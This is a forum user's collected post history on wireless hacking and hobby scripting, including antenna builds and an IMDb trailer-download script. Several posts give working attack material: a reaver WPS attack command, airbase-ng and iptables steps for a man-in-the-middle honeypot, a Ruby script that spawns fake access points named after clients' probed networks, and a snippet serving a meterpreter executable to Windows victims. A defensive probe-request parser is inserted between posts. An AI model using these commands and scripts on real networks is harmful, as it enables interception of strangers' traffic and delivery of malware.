
i8igmac

Dedicated Members
Posts: 939
Days Won: 22

Posts posted by i8igmac

  1. # reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small

    Try reaver... my first try was a success... you need a decent signal for this attack...

    now For cracking the hash...

    get the big WPA wordlist, I think g0tmilk has download links on his blog... I have seen this work almost every time... must have GPU power... purehate has good tutorials for proper driver installation...

  2. I have destroyed my last wrt54g v6.... I was running some tests without a waterproof setup and now it won't broadcast...

    So I have picked up a wrt54g v8 for $5, woot. I need to splice the coax to a barrel connector and install ddwrt, then I'll mount one 9dbi alfa antenna on the roof and a 5dbi in our kitchen... repeater (free for life)

    So what would you do with a wrt54g?

    What have you done?

    what firmware would you recommend?

    can I install ruby and airbase-ng?

    Antennas you have built?

  3. I have not attempted the yagi biquad. I have made the yagi 19 element and was unsatisfied. Each element must be positioned perfectly, if one is out of place then the rest will be useless...

    So my idea of a perfect biquad yagi build would have each element sprayed with a metallic paint that is a conductor... stencils could be made for precisely positioned elements on a plexiglass...

    I still have better success with a parabolic dish and a single biquad for the driven element... I'm sure I could build one to fit in a bag you have picked...

  4. I have a droid thunderbolt with a nice extended powercell. The screen is broken so I can't see anything...

    My question is can I root the device with a custom rom debian server edition? Then ssh into the device and now make good use of its wifi device?

    can this be done without a working screen?

  5. Watch "Long range biquad. Home build" on YouTube

    Long range biquad. Home build:

    I have a few videos on some ddwrt with antenna builds. I used only things around the house. The video above is a biquad in a can and a parabolic dish. HUGE gain from about 1000 feet away, no lag during online gameplay.

    it's all about the perfect parabolic dish...

  6. iwconfig wlan0 channel 6

    ifconfig wlan0 down

    iwconfig wlan0 mode monitor

    ifconfig wlan0 up

    airbase-ng wlan0 -e test-ap-channel-6

    New tab in console

    airodump-ng wlan0

    So we have airodump channel Hopping and at the same time airbase is broadcasting a fake ap on channel 6...

    On my linux mint everything is working as I need. My goal is to capture with airodump all client probe requests and then start airbase on channel 6 with the newly captured probe requests...

    The problem is when I run these same commands above in kali linux. When airodump has your card in channel hop, your same wlan device running airbase is also channel hopping...

    Any ideas why linux mint allows me to accomplish this?

  7. I had to boot up kali to get a working example of a fake ap with dnsmasq...

    simply follow this tutorial http://www.techgeektricks.blogspot.in/2013/07/mitm-wifi-honeypot.html

    and don't forget to add iptables to complete your clients' internet connection

    wlan1 has established a connection to my droid hotspot 4g network... at0 traffic will now pass through

    iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain
    iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT

    echo 1 > /proc/sys/net/ipv4/ip_forward

  8. karma was trouble to install on my machine, I didn't feel like booting BT... so here is a fake ap script... it will capture clients' probe requests and start a new ESSID...

    # start airodump-ng wlan0 -w airbase first
    # this will simply scan the airbase-01.csv file for client probe requests

    @pid_list = [] # this will hold the list of running ESSIDs, "netgear", "freewifi", "cisco"

    def refresh_list # read the airodump csv file and sort through the clients
      block = File.read("airbase-01.csv")
      cut = block.index("\r\n\r\n")
      return if cut.nil?                 # airodump has not written the client section yet
      block_2 = block[cut + 4..-1]       # here is your list of clients (header line included)
      block_2.each_line do |line|
        fields = line.split(",").map(&:strip)
        next if fields.size < 7 || fields[0] == "Station MAC"
        fields[6..-1].each do |essid|    # probed ESSIDs start after the BSSID column
          next if essid.empty? || essid.include?(":") || essid.include?("(not associated)")
          next if @pid_list.include?(essid)
          Thread.start { system("airbase-ng wlan0 -e \"#{essid}\"") }
          @pid_list << essid
        end
      end
    end

    refresh_list
    loop do
      sleep 10
      refresh_list
    end

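The airodump-ng CSV that the script above reads has an access-point section and a station section separated by a blank line. As an added example (not the poster's code), here is a parser for the station section that reports which clients are sending directed probe requests for which ESSIDs, so a wireless audit can find devices whose saved-network lists leak over the air; the CSV sample is constructed and the column layout follows airodump-ng's "Station MAC, ..., BSSID, Probed ESSIDs" header.

```ruby
# Added example: parse the station ("client") section of an airodump-ng CSV and
# report which stations probe for which ESSIDs. A device that probes for its saved
# networks will associate to any AP that answers with that name, so an audit wants
# this list. The CSV below is constructed; ESSIDs containing a comma are not handled.
SAMPLE_CSV = [
  "BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key",
  "00:11:22:AA:BB:CC, 2013-07-01 10:00:00, 2013-07-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,  0,  0.  0.  0.  0,  7, homenet, ",
  "",
  "Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs",
  "02:00:00:00:00:01, 2013-07-01 10:00:10, 2013-07-01 10:04:50, -50,  30, 00:11:22:AA:BB:CC, homenet",
  "02:00:00:00:00:02, 2013-07-01 10:00:20, 2013-07-01 10:04:40, -70,  12, (not associated) , netgear,freewifi,attwifi",
  "02:00:00:00:00:03, 2013-07-01 10:01:00, 2013-07-01 10:04:00, -65,   4, (not associated) , ",
  ""
].join("\r\n")

# Returns { station_mac => [essid, ...] }, reading only the station section.
def probed_essids(csv)
  stations = {}
  in_stations = false
  csv.each_line do |line|
    line = line.chomp
    in_stations = true if line.start_with?("Station MAC")
    next unless in_stations && !line.start_with?("Station MAC")
    fields = line.split(",").map(&:strip)
    next if fields.size < 6                  # blank line or truncated record
    mac = fields[0]
    names = fields[6..-1].to_a.reject(&:empty?) # everything after the BSSID column
    stations[mac] = names
  end
  stations
end

# Stations probing for more than `threshold` names leak a long saved-network list.
def noisy_stations(csv, threshold = 2)
  probed_essids(csv).select { |_, names| names.size > threshold }.keys
end

if __FILE__ == $0
  probed_essids(SAMPLE_CSV).each { |mac, names| puts "#{mac}: #{names.join(', ')}" }
end
```

Run it against a real capture by replacing SAMPLE_CSV with File.read("airbase-01.csv"); a station that shows up in noisy_stations is one whose owner should prune saved networks or disable auto-join.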
  9. If I may try...

    Think about a walkie talkie. Those hand held radios can change channels by pressing a button...

    If you and your friend both have walkie talkies on channel 1 then you can share a conversation...

    Your walkie talkie can also channel hop. That could allow you to listen to all conversations on all channels by changing channels quickly.

    If you notice, when you run airodump your wifi card is channel hopping, trying to record data on all channels.

    I tried :-)

    Edit. misread the question..

  10. Very true. browser COOKIE=finger. I guess I was thinking fingerprint of each client lol

    if finger.include?("windows")
      s.puts(meterpreter.exe)
    end

    Just example. Above...

    if anyone is interested in a team project. I made this example a few years ago... (I meant to post in community projects....)

    All the code is in my head, i have no time to build this.

    Packet manipulation is much needed around here

  11. From Droid...

    There are a few steps you may have to take.

    Maybe set uid in ettercap config.

    Enable IP forwarding per iptables or ipchains, OS specific.

    These 2 above would help you Google search

    Content-length also plays a big part when modding data, always try something simple like replace(poo for pee)

    Try several webpages during your test, msn, yahoo etc... Not https...

    I have some proof of concept I wrote in ruby, when a user downloads an executable during mitm, the binary data is replaced with a meterpreter shell

    https://vimeo.com/51230425

  12. #will get trailers....
    #depends on apt-get install rtmpdump and wget
    #set of rules for this to work... the name of the folder must be the proper name as listed below, these names are also an exact match from imdb

    #/media/500_gig/movies/21 jump street (2012)/movie_file.avi     <--------  GOOD
    #/media/500_gig/movies/21_jump_street_xvid_crap/movie_file.avi  <---   BAD

    #example
    #    ls /media/500_gig/movies/
    #		21 Jump Street (2012)
    #		antitrust (2001)
    #		Avatar (2009)
    #		Basketball diaries (1995)
    #		be kind rewind (2008)
    #		blank check (1994)
    #		blow (2001)
    #		buffalo soldiers (2001)

    #run this script from any directory... the destination directory must be changed below
    #sudo ruby get_trailer.rb "movie name (2000)"

    Need sudo to write data to hard drive

    require 'socket'
    require 'cgi'

    abort "usage: sudo ruby get_trailer.rb \"movie name (2000)\"" if ARGV[0].nil?
    puts movie_name = ARGV[0]
    dst_dir = "/media/6E88F3A627ADD9B7/movies/#{movie_name}/"    # <-------- change this
    movie_name = movie_name.gsub(" ", "+").chomp

    # plain HTTP/1.0 GET against imdb, returns the raw response (headers and body)
    def fetch(path)
      s = TCPSocket.open("www.imdb.com", 80)
      s.print("GET #{path} HTTP/1.0\r\nHost: www.imdb.com\r\n\r\n")
      buff = ""
      while line = s.gets
        buff << line
      end
      s.close
      buff
    end

    # fetch the flash player page of a trailer, read until </html> or the server closes,
    # and return it with the quotes stripped so the so.addVariable(...) values can be cut out
    def player_page(trailer_home)
      payload = "GET /#{trailer_home}player?stop=0 HTTP/1.1\r\n" \
                "Host: www.imdb.com\r\n" \
                "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0\r\n" \
                "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" \
                "Accept-Language: en-US,en;q=0.5\r\n" \
                "Proxy-Connection: keep-alive\r\n\r\n"
      s = TCPSocket.open("www.imdb.com", 80)
      s.print(payload)
      buff3 = ""
      while chunk = s.recv(5000)
        break if chunk.empty?            # connection closed by the server
        buff3 << chunk
        break if buff3.include?("</html>")
      end
      s.close
      buff3.gsub('"', "")
    end

    # value of so.addVariable(name, ...) in the player page, e.g. the file url or the rtmp id
    def add_variable(page, name)
      key = "so.addVariable(#{name}, "
      ping = page.index(key)
      return nil if ping.nil?
      pong = page.index(");", ping)
      CGI.unescape(page[ping + key.size..pong - 1])
    end

    # gather the movie_home link from the search results
    buff = fetch("/find?q=#{movie_name}").gsub('"', "")
    ping = buff.index("/title/")
    if ping.nil?
      puts "EXIT: next"
      exit
    end
    movie_home = buff[ping..ping + 16]    # IFRAME home page / root page crawl from starting point
    tt = buff[ping + 7..ping + 15]        # the ttNNNNNNN id of the first hit

    buff1 = fetch("/title/#{tt}/")

    image_link = buff1.scan(/media.rm.*./).first.to_s[0..26]  # media/rm871673856/tt1232829
    rm = image_link.scan(/\/.*.\//).first.to_s
    buff2 = fetch("/media#{rm}#{tt}/")    # poster page, not used yet

    double_trailer_prevent = 0
    if ping = buff1.index("video/imdb/vi")
      double_trailer_prevent = 1
      puts trailer_home = buff1[ping..ping + 28]
      trailer_home = trailer_home.scan(/video.imdb.vi.*.\//).first
      buff3 = player_page(trailer_home)
      v_file = add_variable(buff3, "file")
      if v_file.to_s.include?("rtmp")
        v_id = add_variable(buff3, "id")
        q = '"'
        puts "\n"
        system("rtmpdump -r #{q}rtmp://amazonimdb.fcod.llnwd.net/a2643#{q} -a #{q}a2643#{q} -f #{q}LNX 11,2,202,243#{q} -W #{q}http://www.imdb.com/images/js/app/video/mediaplayer.swf#{q} -p #{q}http://www.imdb.com#{q} -y #{q}#{v_id}#{q} -o '#{dst_dir}trailer.flv'")
      end
    end

    if ping = buff1.index("video/screenplay/vi")
      if double_trailer_prevent == 1
        puts "double file download attempt"
        exit
      end
      puts trailer_home = buff1[ping..ping + 30]
      trailer_home = trailer_home.scan(/video.screenplay.vi.*.\//).first
      buff3 = player_page(trailer_home)
      v_file = add_variable(buff3, "file")
      if v_file.to_s.include?("http")
        puts "\n"
        system("wget '#{v_file}' -O '#{dst_dir}trailer.flv'")
      end
    end

    

    So, it's ugly... don't judge me... it was successful 95% of the time (wrong name = fail, or trailer does not exist)

    there is no error checking... now to process a whole list will take another small script...

    irb mode...

    data = `ls /media/500_gig/movies/`
    data.each_line do |movie_name|
      system("ruby", "get_trailer.rb", movie_name.chomp)
    end

    Now I hope to get some help with a template for the site... I just want to scroll through a list of images like netflix... can someone contribute?

    I'm very noob with building a webpage... so maybe some decent example code would be appreciated...

  13. (first post was from a droid so was quick, now I have an example to share)

    I have been using wireshark, tcpick, burp to investigate my way through traffic and this is a working download request... you can try if you like or take my word for it...

    nc progressive.totaleclips.com.edgesuite.net 80 > out.mp4

    GET /127/e12782_301.mp4?eclipId=e12782&bitrateId=471&vendorId=102&type=.mp4&sp_ubid=746-5916787-1173752 HTTP/1.1
    Host: progressive.totaleclips.com.edgesuite.net
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Referer: http://www.imdb.com/images/js/app/video/mediaplayer.swf

    (working on some examples for another reply)
